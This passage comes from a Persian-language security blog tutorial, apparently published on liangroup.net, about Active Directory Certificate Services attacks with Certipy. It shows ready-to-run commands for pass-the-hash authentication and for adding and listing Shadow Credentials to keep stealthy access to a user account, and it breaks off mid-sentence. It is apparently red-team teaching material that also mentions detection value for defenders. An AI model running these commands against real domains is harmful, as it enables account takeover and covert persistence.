\u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 PKINIT \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f \u0648 \u0646\u062a\u06cc\u062c\u0647 \u0622\u0646 \u062f\u0631\u06cc\u0627\u0641\u062a \u0647\u0634 NTLM \u0648 \u06a9\u0633\u0628 \u062f\u0633\u062a\u0631\u0633\u06cc \u06a9\u0627\u0645\u0644 \u0628\u0647 \u0645\u0646\u0627\u0628\u0639 \u062f\u0627\u0645\u0646\u0647 \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19887\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/8-300x82.png\" alt=\"\" width=\"516\" height=\"141\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/8-300x82.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/8-1024x280.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/8-768x210.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/8-150x41.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/8.png 1373w\" sizes=\"(max-width: 516px) 100vw, 516px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632<\/strong><strong> NTLM Hash <\/strong><strong>\u0648 \u0628\u0631\u0631\u0633\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc\u200c\u0647\u0627<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u06cc \u0645\u0627\u060c \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u062a\u0627 \u0646\u0634\u0627\u0646 \u062f\u0647\u06cc\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06cc\u06a9 \u0647\u0634 NTLM \u0634\u0646\u0627\u062e\u062a\u0647\u200c\u0634\u062f\u0647 (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u062d\u0633\u0627\u0628 raj) \u0628\u0647 Active Directory \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u06a9\u0631\u062f\u0647 \u0648 \u0645\u062c\u0648\u0632\u0647\u0627 \u0648 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0628 Administrator \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u06a9\u0631\u062f. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0634\u062e\u0635 \u06a9\u0646\u062f \u06a9\u0647 \u0622\u06cc\u0627 \u062d\u0633\u0627\u0628 raj \u0642\u0627\u062f\u0631 \u0628\u0647 \u062a\u063a\u06cc\u06cc\u0631 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0628\u060c \u062a\u0632\u0631\u06cc\u0642 \u0627\u0639\u062a\u0628\u0627\u0631 \u067e\u0646\u0647\u0627\u0646 (Shadow Credentials) (\u0645\u0637\u0627\u0628\u0642 \u0628\u0627 \u062d\u0645\u0644\u0647 ESC10) \u06cc\u0627 \u0628\u0627\u0632\u0646\u0634\u0627\u0646\u06cc \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9 \u0632\u0645\u0627\u0646\u06cc \u0628\u0633\u06cc\u0627\u0631 \u06a9\u0644\u06cc\u062f\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0647\u0634 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u062f\u0631 \u062f\u0633\u062a\u0631\u0633 \u0628\u0627\u0634\u062f \u0648\u0644\u06cc \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0645\u062a\u0646 \u0633\u0627\u062f\u0647 (cleartext) \u0645\u0648\u062c\u0648\u062f \u0646\u0628\u0627\u0634\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad account -u raj -hashes 64fbae31cc352fc26af97cbdef151e03 -dc-ip 192.168.1.20 -user 'administrator' read<\/span><\/pre>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634\u060c \u062a\u0623\u06a9\u06cc\u062f \u0634\u062f\u0647 \u06a9\u0647 \u062f\u0631 \u0634\u0631\u0627\u06cc\u0637\u06cc \u06a9\u0647 \u0645\u0647\u0627\u062c\u0645 \u0628\u0647 \u0647\u0634 NTLM \u062f\u0633\u062a\u0631\u0633\u06cc \u062f\u0627\u0631\u062f \u0627\u0645\u0627 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0631\u0627 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0648\u0627\u0636\u062d \u0646\u0645\u06cc\u200c\u062f\u0627\u0646\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0647\u0645\u0686\u0646\u0627\u0646 \u0627\u0632 Certipy \u0628\u0631\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0648 \u0627\u0646\u062c\u0627\u0645 \u0628\u0631\u0631\u0633\u06cc\u200c\u0647\u0627\u06cc \u062d\u06cc\u0627\u062a\u06cc \u0631\u0648\u06cc \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u067e\u0631\u0627\u0645\u062a\u06cc\u0627\u0632 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u062f. \u0627\u06cc\u0646 \u0631\u0648\u0634 \u0628\u0647\u200c\u0637\u0648\u0631 \u062e\u0627\u0635 \u062f\u0631 \u062d\u0645\u0644\u0627\u062a\u06cc \u0645\u062b\u0644 ESC10 \u06a9\u0627\u0631\u0628\u0631\u062f \u062f\u0627\u0631\u062f \u0648 \u0631\u0627\u0647\u06cc \u0645\u0624\u062b\u0631 \u0628\u0631\u0627\u06cc \u062c\u0645\u0639\u200c\u0622\u0648\u0631\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0648 \u0628\u0631\u0631\u0633\u06cc \u067e\u062a\u0627\u0646\u0633\u06cc\u0644 \u0627\u0641\u0632\u0627\u06cc\u0634 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19888\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/9-300x66.png\" alt=\"\" width=\"527\" height=\"116\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/9-300x66.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/9-1024x227.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/9-768x170.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/9-150x33.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/9.png 1495w\" sizes=\"(max-width: 527px) 100vw, 527px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0645\u062f\u06cc\u0631\u06cc\u062a<\/strong><strong> Shadow Credentials (<\/strong><strong>\u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646<\/strong><strong>)<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc\u200c\u0647\u0627\u06cc \u0628\u0627\u0644\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627 (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c ESC1)\u060c \u062a\u0645\u0631\u06a9\u0632 \u0645\u0627 \u0627\u0632 \u0627\u0641\u0632\u0627\u06cc\u0634 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc (Privilege Escalation) \u0628\u0647 \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc (Persistence) \u062a\u063a\u06cc\u06cc\u0631 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><br \/>\n<span style=\"font-size: 10pt\">Shadow Credentials \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0628\u0647 \u0645\u0627 \u0645\u06cc\u200c\u062f\u0647\u0646\u062f \u06a9\u0647 \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0648\u0631\u0648\u062f \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u0631\u0627 \u0628\u062f\u0648\u0646 \u062a\u063a\u06cc\u06cc\u0631 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u06a9\u0627\u0631\u0628\u0631 \u0648 \u0628\u062f\u0648\u0646 \u0627\u06cc\u062c\u0627\u062f \u0647\u0634\u062f\u0627\u0631 \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0633\u0646\u062a\u06cc\u060c \u0628\u0647 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc \u062f\u06cc\u06af\u0631\u06cc \u062a\u0632\u0631\u06cc\u0642 \u06a9\u0646\u06cc\u0645.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u062f\u0631 \u0648\u06cc\u0698\u06af\u06cc msDS-KeyCredentialLink \u0630\u062e\u06cc\u0631\u0647 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f \u0648 \u062f\u0631 \u0641\u0631\u0622\u06cc\u0646\u062f \u0648\u0631\u0648\u062f \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Kerberos PKINIT \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u0646\u062f. \u0627\u06cc\u0646 \u0631\u0648\u0634:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\"><strong>\u0645\u0642\u0627\u0648\u0645 \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u0631\u06cc\u0633\u062a \u0631\u0645\u0632 \u0639\u0628\u0648\u0631<\/strong><\/span><\/li>\n<li><span style=\"font-size: 10pt\"><strong>\u067e\u0646\u0647\u0627\u0646 \u0648 \u0646\u0627\u0634\u0646\u0627\u0633<\/strong><\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0648 <strong>\u0628\u0633\u06cc\u0627\u0631 \u0645\u0624\u062b\u0631 \u0628\u0631\u0627\u06cc \u062d\u0641\u0638 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0644\u0646\u062f\u0645\u062f\u062a<\/strong> \u0627\u0633\u062a.<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u06cc \u0645\u0627\u060c \u0628\u0631\u0627\u06cc \u062a\u062b\u0628\u06cc\u062a \u062d\u0636\u0648\u0631 \u0648 \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc\u060c \u06cc\u06a9 Shadow Credential \u0628\u0647 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631 shivam \u0627\u0636\u0627\u0641\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645\u060c \u0628\u0627 \u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u0648\u06cc\u0698\u06af\u06cc msDS-KeyCredentialLink. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0647 \u0645\u0627 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u062f\u0627\u0646\u0633\u062a\u0646 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 shivam\u060c \u0628\u0647 \u062d\u0633\u0627\u0628 \u0627\u0648 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0648\u0627\u0631\u062f \u0634\u0648\u06cc\u0645.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0646\u06a9\u062a\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc: \u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9 \u06a9\u0647 \u062f\u0631 \u062f\u0633\u062a\u0647 \u062d\u0645\u0644\u0627\u062a ESC9\/ESC10 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f\u060c \u0628\u0633\u06cc\u0627\u0631 \u067e\u0646\u0647\u0627\u0646\u200c\u06a9\u0627\u0631\u0627\u0646\u0647 \u0627\u0633\u062a\u060c \u0627\u06a9\u062b\u0631 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u062a\u0634\u062e\u06cc\u0635 \u0633\u0646\u062a\u06cc \u0631\u0627 \u062f\u0648\u0631 \u0645\u06cc\u200c\u0632\u0646\u062f \u0648 \u062d\u062a\u06cc \u067e\u0633 \u0627\u0632 \u0631\u06cc\u0633\u062a \u06a9\u0631\u062f\u0646 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0646\u06cc\u0632 \u0645\u0627\u0646\u062f\u06af\u0627\u0631 \u0628\u0627\u0642\u06cc \u0645\u06cc\u200c\u0645\u0627\u0646\u062f\u2014\u0645\u06af\u0631 \u0627\u06cc\u0646\u06a9\u0647 \u0635\u0631\u0627\u062d\u062a\u0627\u064b \u062d\u0630\u0641 \u0634\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0627\u0641\u0632\u0648\u062f\u0646 \u06cc\u06a9<\/strong><strong> Shadow Credential<\/strong><\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam add<\/span><\/pre>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u06cc\u06a9 \u06a9\u0644\u06cc\u062f \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647\u200c\u0627\u06cc \u062c\u062f\u06cc\u062f \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0631\u0627 \u062f\u0631 \u0648\u06cc\u0698\u06af\u06cc msDS-KeyCredentialLink \u06a9\u0627\u0631\u0628\u0631 shivam \u062a\u0632\u0631\u06cc\u0642 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u067e\u0633 \u0627\u0632 \u0627\u0641\u0632\u0648\u062f\u0646\u060c \u0627\u06cc\u0646 \u06a9\u0644\u06cc\u062f \u0627\u0645\u06a9\u0627\u0646 \u0648\u0631\u0648\u062f \u0628\u062f\u0648\u0646 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0631\u0627 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 shivam \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f\u2014\u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645\u200c\u0647\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc \u0645\u0627\u0646\u0646\u062f PKINIT.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0648 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06a9\u0644\u06cc\u062f \u062a\u0632\u0631\u06cc\u0642\u200c\u0634\u062f\u0647\u060c \u0628\u0627\u0631\u0647\u0627 \u0648 \u0628\u062f\u0648\u0646 \u062c\u0644\u0628 \u062a\u0648\u062c\u0647 \u0648\u0627\u0631\u062f \u0633\u06cc\u0633\u062a\u0645 \u0634\u0648\u062f\u2014\u06a9\u0647 \u0627\u06cc\u0646 \u06cc\u06a9\u06cc \u0627\u0632 \u0642\u062f\u0631\u062a\u0645\u0646\u062f\u062a\u0631\u06cc\u0646 \u0631\u0648\u0634\u200c\u0647\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc post-exploitation \u062f\u0631 Active Directory \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19889\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/10-300x91.png\" alt=\"\" width=\"514\" height=\"156\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/10-300x91.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/10-1024x311.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/10-768x233.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/10-150x46.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/10.png 1080w\" sizes=\"(max-width: 514px) 100vw, 514px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0646\u06a9\u062a\u0647: \u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9 \u0647\u0633\u062a\u0647\u200c\u06cc \u0627\u0635\u0644\u06cc \u062d\u0645\u0644\u0647 ESC10 \u0628\u0647\u200c\u0634\u0645\u0627\u0631 \u0645\u06cc\u200c\u0631\u0648\u062f. \u062f\u0631 \u0627\u06cc\u0646 \u0633\u0646\u0627\u0631\u06cc\u0648\u060c \u062a\u0632\u0631\u06cc\u0642 \u06cc\u06a9 \u06a9\u0644\u06cc\u062f \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0627\u06cc \u0628\u0647 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631 \u062f\u06cc\u06af\u0631 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0646\u06cc\u0627\u0632\u06cc \u0628\u0647 \u062f\u0632\u062f\u06cc\u062f\u0646 \u06cc\u0627 \u0628\u0627\u0632\u0646\u0634\u0627\u0646\u06cc \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0646\u0628\u0627\u0634\u062f. Shadow Credential\u0647\u0627 \u062d\u062a\u06cc \u067e\u0633 \u0627\u0632 \u062a\u063a\u06cc\u06cc\u0631 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0646\u06cc\u0632 \u0628\u0627\u0642\u06cc \u0645\u06cc\u200c\u0645\u0627\u0646\u0646\u062f \u0648 \u0627\u0632 \u0622\u0646\u062c\u0627 \u06a9\u0647 \u062f\u0631 \u0628\u0633\u06cc\u0627\u0631\u06cc \u0627\u0632 \u0633\u0627\u0645\u0627\u0646\u0647\u200c\u0647\u0627\u06cc \u0645\u0627\u0646\u06cc\u062a\u0648\u0631\u06cc\u0646\u06af \u0633\u0646\u062a\u06cc \u0644\u0627\u06af \u0646\u0645\u06cc\u200c\u0634\u0648\u0646\u062f\u060c \u062a\u0646\u0647\u0627 \u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0645\u06cc\u200c\u0634\u0648\u0646\u062f \u06a9\u0647 \u0635\u0631\u0627\u062d\u062a\u0627\u064b \u0628\u0631\u0631\u0633\u06cc \u0634\u062f\u0647 \u0628\u0627\u0634\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0641\u0647\u0631\u0633\u062a \u06a9\u0631\u062f\u0646<\/strong><strong> Shadow Credential<\/strong><strong>\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0628\u0631\u0631\u0633\u06cc \u0627\u06cc\u0646\u06a9\u0647 \u0686\u0647 Shadow Credential\u0647\u0627\u06cc\u06cc \u062f\u0631 \u062d\u0627\u0644 \u062d\u0627\u0636\u0631 \u0628\u0647 \u062d\u0633\u0627\u0628 shivam \u0645\u062a\u0635\u0644 \u0647\u0633\u062a\u0646\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f. \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u062a\u0645\u0627\u0645 \u0634\u0646\u0627\u0633\u0647\u200c\u0647\u0627\u06cc \u062f\u0633\u062a\u06af\u0627\u0647 (Device IDs) \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 \u06a9\u0644\u06cc\u062f\u0647\u0627\u06cc \u062b\u0628\u062a\u200c\u0634\u062f\u0647 \u062f\u0631 \u0648\u06cc\u0698\u06af\u06cc msDS-KeyCredentialLink \u0631\u0627 \u0644\u06cc\u0633\u062a \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam list<\/span><\/pre>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u0631\u0627\u06cc \u062a\u062d\u0644\u06cc\u0644 \u062f\u0633\u062a\u0631\u0633\u06cc\u200c\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646\u060c \u06a9\u0634\u0641 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u0647\u0627 \u06cc\u0627 \u067e\u0627\u06a9\u200c\u0633\u0627\u0632\u06cc \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642\u200c\u0634\u062f\u0647 \u062f\u0631 \u0641\u0627\u0632 \u067e\u0633 \u0627\u0632 \u062d\u0645\u0644\u0647 (Post-Exploitation) \u0628\u0633\u06cc\u0627\u0631 \u062d\u06cc\u0627\u062a\u06cc \u0647\u0633\u062a\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0645\u062c\u0645\u0648\u0639\u060c \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u06cc\u06a9\u06cc \u0627\u0632 \u06a9\u0644\u06cc\u062f\u06cc\u200c\u062a\u0631\u06cc\u0646 \u06af\u0627\u0645\u200c\u0647\u0627 \u062f\u0631 \u062d\u0641\u0638 \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u0645\u062e\u0641\u06cc\u0627\u0646\u0647 \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u0627\u0633\u062a\u060c \u0686\u0631\u0627 \u06a9\u0647 \u0645\u0647\u0627\u062c\u0645 \u0631\u0627 \u0642\u0627\u062f\u0631 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f \u062a\u0627 \u0628\u062f\u0648\u0646 \u0627\u06cc\u062c\u0627\u062f \u062a\u063a\u06cc\u06cc\u0631 \u0642\u0627\u0628\u0644\u200c\u0645\u0634\u0627\u0647\u062f\u0647\u200c\u0627\u06cc \u062f\u0631 \u0631\u0641\u062a\u0627\u0631 \u062d\u0633\u0627\u0628\u060c \u0628\u0647 \u062d\u0636\u0648\u0631 \u0645\u062e\u0641\u06cc \u062e\u0648\u062f \u0627\u062f\u0627\u0645\u0647 \u062f\u0647\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19890\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/11-300x51.png\" alt=\"\" width=\"512\" height=\"87\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/11-300x51.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/11-1024x173.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/11-768x130.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/11-150x25.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/11.png 1112w\" sizes=\"(max-width: 512px) 100vw, 512px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0646\u06a9\u062a\u0647: \u0627\u06cc\u0646 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u0631\u0627\u06cc \u0647\u0631 \u062f\u0648 \u06af\u0631\u0648\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 (Red Team) \u0648 \u0645\u062f\u0627\u0641\u0639\u0627\u0646 (Blue Team) \u0627\u0631\u0632\u0634\u0645\u0646\u062f \u0627\u0633\u062a:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0632 \u0622\u0646 \u0628\u0631\u0627\u06cc \u0628\u0631\u0631\u0633\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc\u200c\u0647\u0627\u06cc \u0642\u0628\u0644\u06cc \u06cc\u0627 \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u062b\u0628\u062a Shadow Credential \u062a\u06a9\u0631\u0627\u0631\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u0646\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0645\u062f\u0627\u0641\u0639\u0627\u0646 \u0646\u06cc\u0632 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0631\u0648\u0634\u200c\u0647\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u0627\u0636\u0627\u0641\u0647\u200c\u0634\u062f\u0647 \u067e\u0633 \u0627\u0632 \u0646\u0641\u0648\u0630 \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0648 \u062a\u062d\u0644\u06cc\u0644 \u06a9\u0646\u0646\u062f\u2014\u0686\u06cc\u0632\u06cc \u06a9\u0647 \u0628\u0627 \u0646\u06cc\u0627\u0632\u0647\u0627\u06cc \u0648\u0627\u0642\u0639\u06cc \u062a\u062d\u0642\u06cc\u0642\u0627\u062a \u062c\u0631\u0645\u200c\u0634\u0646\u0627\u0633\u06cc (Forensics) \u062f\u0631 \u0639\u0645\u0644\u06cc\u0627\u062a \u062a\u06cc\u0645 \u0642\u0631\u0645\u0632 \u0648 \u0622\u0628\u06cc \u0647\u0645\u200c\u0631\u0627\u0633\u062a\u0627 \u0627\u0633\u062a.<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\"><strong>\u0628\u0631\u0631\u0633\u06cc \u06cc\u06a9<\/strong><strong> Shadow Credential <\/strong><strong>\u062e\u0627\u0635<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0645\u0634\u0627\u0647\u062f\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a 